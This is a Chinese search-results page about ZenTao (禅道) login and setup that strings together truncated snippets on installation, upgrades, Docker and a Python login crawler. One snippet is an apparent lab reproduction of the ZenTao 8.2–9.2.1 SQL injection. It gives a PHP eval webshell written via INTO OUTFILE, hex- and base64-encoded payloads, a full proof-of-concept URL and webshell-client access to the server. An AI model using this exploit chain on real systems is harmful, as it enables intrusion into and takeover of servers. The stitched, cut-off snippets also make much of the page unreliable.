精华内容
下载资源
问答
  • python针对禅道登陆接口的自动化测试,+unittest+ddt接口自动化数据驱动并生成中文版的html报告;第一次写接口自动化的测试,学到很多东西,有不懂的客户加微信
  • 用爬虫登陆禅道最新版

    千次阅读 2018-12-25 12:08:04
    公司有个内部的项目管理软件,其中任务和bug模块需要从禅道发起,然后用爬虫爬取禅道的任务和bug列表及详细信息,从而需要获取禅道登陆token 经过研究,发现禅道登陆流程如下: 打开登陆页面的时候页面产生一个...

    公司有个内部的项目管理软件,其中任务和bug模块需要从禅道发起,然后用爬虫爬取禅道的任务和bug列表及详细信息,从而需要获取禅道的登陆token
    经过研究,发现禅道的登陆流程如下:

    1. 打开登陆页面的时候页面产生一个zentaosid的唯一标识,以及一个verifyRand随机值
    2. 对输入的密码进行md5加密
    3. 已经加密的密码+verifyRand再一次md5加密
    4. 然后post请求登陆地址根据唯一的zentaosid验密

    知道了以上步骤不难写出爬虫代码,以python为例

    import hashlib
    
    import requests
    from lxml import html
    
    loginUrl = '禅道的登陆地址'
    password = '密码'
    loginName = '用户名'
    
    def getToken():
        loginPage = requests.get(loginUrl)
        loginPage.encoding = 'utf-8'
        SID = loginPage.cookies['zentaosid']
        print('SID = ' + SID)
        loginTree = html.fromstring(loginPage.text)
        verifyRand = loginTree.xpath('//*[@id="verifyRand"]')
        if verifyRand:
            verifyRand = verifyRand[0].attrib['value']
        print('verifyRand = ' + verifyRand)
        hl = hashlib.md5()
        hl.update(password.encode(encoding='utf-8'))
        print('Md5 第一次加密结果 = ' + hl.hexdigest())
        passwordResult = hl.hexdigest() + verifyRand
        print("passwordResult=" + passwordResult)
        hlLast = hashlib.md5()
        hlLast.update(passwordResult.encode(encoding='utf-8'))
        print('Md5 第二次加密结果 = ' + hlLast.hexdigest())
        loginBody = {"account": loginName, "password": hlLast.hexdigest(), "keepLogin[]": "on"}
        loginCookies = dict(zentaosid=SID, lang='zh-cn', keepLogin='on')
        loginResultPage = requests.post(loginUrl, data=loginBody, cookies=loginCookies)
        print('loginResultPage = ' + loginResultPage.text)
        token = loginResultPage.cookies['zp']
        print('token = ' + token)
        return token
    
    

    获取token之后就可以愉快的爬取自己需要的信息了

    展开全文
  • 禅道

    2019-09-26 10:40:19
    禅道下载地址:https://www.zentao.net/download/79936.html 禅道安装方法:https://www.zentao.net/book/zentaopmshelp/90.mhtml svn安装方法:https://www.cnblogs.com/javayu/p/6165312.html 转载于:...

    禅道下载地址:https://www.zentao.net/download/79936.html

    禅道安装方法:https://www.zentao.net/book/zentaopmshelp/90.mhtml

    svn安装方法:https://www.cnblogs.com/javayu/p/6165312.html

    转载于:https://www.cnblogs.com/nikeke/p/10178758.html

    展开全文
  • 问题描述: IE、火狐等浏览器都能正确的访问禅道,但是谷歌无法访问! 解决方案: 因为广告屏蔽插件问题 关掉就能完成访问禅道

    问题描述:

    IE、火狐等浏览器都能正确的访问禅道,但是谷歌无法访问!

    解决方案:

    因为广告屏蔽插件问题
    ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201225162548738.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzE4NDU3NzI1,size_16,color_FFFFFF,t_7将这个插件关掉 就能访问了
    关掉就能完成访问禅道了

    展开全文
  • 一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。...
    一、漏洞简介

    该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取webshell。

    二、环境搭建 1 . 测试环境下载地址: https://www.zentao.net/download/80035.html ,下载完成以后点击进行安装操作 0ed7bd2fb0c40428d2869022fa77e340.png 2 . 安装成功后会在D: \111111\ 下面生成一个x a mpp的文件夹 a99db32b4f7df8c9ddd2620960cf2d87.png 3 . 进入x a mpp文件夹,点击start.exe文件,点击“启动”按钮,显示正在运行。 bb6c9d112f9e6b54d2ecd9b23a6793fa.png 4 . 查看服务器本机的IP地址 a6e9c298b7e77d98ee865d272dbacd46.png 5 . 输入网址: http://192.168.29.135/ 进行访问搭建的禅道网站 39ed5543af9f1a41905437e1981fccf7.png 6 . 访问该路径: http://192.168.29.135/zentao/index.php?mode=getconfig ,获取版本号为9 .1.2 ,该版本存在免登陆的SQL注入漏洞 c3ff6fcf9573f8efe7a5e8cbc2abfa85.png 三、漏洞复现 1 . 随便访问一个不存在的路径 http://192.168.29.135/zentao/getshell ,会出现报错,报错回显出文件的存放路径为D: \111111\ 3b40caf6795c1b45631c8474bd6ce13f.png 2 . 根据报错回显的路径,写入一句话木马:

    select'<?php @eval($_POST[1])?>' into outfile'D:/111111/xampp/zentao/www/xx.php'

    3 . 将上述语句进行ASCII hex加密,得到 73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027443a2f3131313131312f78616d70702f7a656e74616f2f7777772f78782e70687027 4 . 继续将加密的语句放入下列中 {"orderBy":"order limit 1;SET @SQL=0x73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027443a2f3131313131312f78616d70702f7a656e74616f2f7777772f78782e70687027;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"} 有部分使用了MySQL的预处理查询绕过程序的过滤,0x加密部分解密 5 . 对上述语句进行base 64 加密 eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQ0M2EyZjMxMzEzMTMxMzEzMTJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjc4NzgyZTcwNjg3MDI3O1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9 6 . 构造poc地址: http://192.168.29.135/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQ0M2EyZjMxMzEzMTMxMzEzMTJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjc4NzgyZTcwNjg3MDI3O1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9 返回结果为红框处乱码, P s:必须添加referer : http://192.168.29.135/zentao 69b2d0f048dd4842db36beba1adb3f8d.png 7. 查看服务器端,木马已经上传到服务器端系统 e2c5f18f2a68856db416f83a4611fa91.png 8. 使用菜刀进行连接,URL为: http://192.168.29.135/zentao/xx.php ,密码为1,已可以连接至服务器,并进行操作 2223f85c5d314f169b99f56910c5c874.png
    展开全文
  • 禅道无法登陆,报错 如下: 17:05:32 ERROR: SQLSTATE[HY000] [1045] Access denied for user ‘root’@‘localhost’ (using password: NO) in G:\JustFornow\chandao\xampp\zentao\framework\base\router.class....
  • ... public function identify($account, $password)   {   if(!$account or !...有关禅道方法重写的问题请参照禅道插件说明,下面有pdf。 转载于:https://blog.51cto.com/jkers/579787
  • 一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。...
  • 禅道使用

    2018-11-08 11:30:17
    登陆之后修改超级管理员信息,之后点组织添加账户(支持批量添加)包括对用户、部门、分组、权限、动态及公司的查看与添加修改管理功能。 (1)用户管理: (2)部门管理: (3)权限管理:权限管理包含了视图权限...
  • 在页游公司,短时期的需求变更以及bug修改时不可避免的,一般常用的bug管理系统就是bugfree,需求就是...常常在todolist上面提交的需求无人跟进,因此尝试安装禅道管理系统。 官网地址:www.zentao.cn,但是禅道在linu
  • 禅道安装

    2017-10-23 13:59:20
    一.下载软件 ... ...有多个版本,我们选默认选择免费的版本,就是没有单独写明...登陆就会要求修改管理员密码。 其他详细操作手册就详见官方帮助了。 http://www.zentao.net/book/zentaopmshelp/44.html
  • 禅道使用经验

    2020-07-10 17:50:59
    禅道的部署和使用禅道的部署 禅道的部署 禅道的部署是在禅道安装后的一个操作: 首先进入禅道的安装文件,启动禅道的相关服务 点击"启动禅道"按钮后会弹出数据库密码修改界面,如果在弹出界面点击"OK",那么你本地的...
  • 禅道的安装

    2020-09-04 15:31:52
    下载禅道的安装包 双击文件,安装(解压) 查找禅道所安装的路径 点击服务:apche可以选择80或88端口,mysql可以选择3306或3308端口 点击访问禅道,页面会自动跳转到禅道的页面。 ...4.登陆成功 ...
  • 文章目录Docker - 搭建禅道管理软件 zentao1、拉取镜像2、运行镜像3、删除容器4、进入面板5、同步时区6、查看运行状态7、禅道的dockerfile8、如何登陆禅道 Docker - 搭建禅道管理软件 zentao 这里使用的开源版的...
  • 查看服务器的系统位数uname -a有x86 64就表示64位的,没有就表示32位的下载禅道安装包Linux64...
  • 禅道升级踩坑

    千次阅读 2018-11-07 17:20:59
    1、本公司的禅道8.2.1,我发现没有用例套件的功能,需要升级到9.0.1才行; 2、从网上下载一看已经到10.4,那就升级到这个版本吧; 3、服务器配置: root@templet:/opt/zbox/app/zentao/config# uname -a Linux ...
  • linux部署禅道

    2021-08-16 11:33:17
    本文参考禅道官网 https://www.zentao.net/book/zentaopmshelp/90.html 没有特殊需求的情况下,直接使用一键安装包,方便、快捷。 下载禅道安装包 到禅道官网直接下载安装包 将安装包直接解压到/opt目录下 修改端口...
  • 003-禅道

    2019-05-17 17:16:00
    一、禅道介绍 1.1禅道项目管理软件是做什么的? 禅道由青岛易软天创网络科技有限公司开发,国产开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目...
  • 禅道升级

    2017-02-14 22:31:00
    比如之前禅道安装的目录是在c:\xampp\zentao下面,则将代码覆盖到c:\xampp\zentao,操作方法:zentaopms/ 下面复制所有的文件到 xampp/zentao/ 下面粘帖。 执行升级程序。假设禅道的访问路径是...
  • arm安装禅道

    2021-08-19 09:42:37
    软件准备: ... mysql5.6 apach2.4.48 最关键的是禅道开源版15.2, (这个禅道很狗血的是它不在下载列表,...除了禅道,都是需要编译的,上边所有软件都是源码状态,最后安装到/usr/local/xxx,xxx要提前创建文件夹如a
  • 禅道如何使用

    2019-09-12 09:49:18
    禅道安装及运行 禅道是一款开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。 禅道将产品、项目、测试...
  • Liunx 安装禅道

    2019-04-16 11:23:27
    1.禅道下载https://www.zentao.net/download/80131.html 禅道官网安装教程https://www.zentao.net/book/zentaopmshelp/90.html 2.解压到/opt目录下 sudo tar -zxvf ZenTaoPMS.11.4.1....3.启动禅道 执行/opt/...
  • 安装禅道

    2015-05-26 21:10:00
    安装完成后进去登陆页面开始使用禅道. 附: 安装apache: yum install httpd httpd-devel  启动apache: /etc/init.d/httpd start 此时输入服务器的IP地址,应该看到apache的服务页面,端口不用输,...
  • 禅道——使用教程

    千次阅读 多人点赞 2019-05-04 10:12:43
    原地址:... 一.禅道安装及运行禅道是一款开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件...
  • 禅道安装部署环境

    千次阅读 2019-07-29 17:56:22
    禅道安装部署环境 (第一次部署环境,希望有用) 本次主要进行:禅道的安装与环境部署 禅道下载地址:https://www.zentao.net/download/80153.html Windows x64的开源版11.6 下载成功之后,直接双击打开。 把: D:\...
  • liux 禅道安装

    2019-11-27 15:50:02
    linux一键安装禅道: 1.禅道帮助文档:http://www.zentao.net/book/zentaopmshelp/90.html 2.修改Apache的端口号:/opt/zbox/zbox -ap 18080 修改Mysql的端口:/opt/zbox/zbox -mp 8080 3.执行/opt/zbox/zbox ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 783
精华内容 313
关键字:

禅道登陆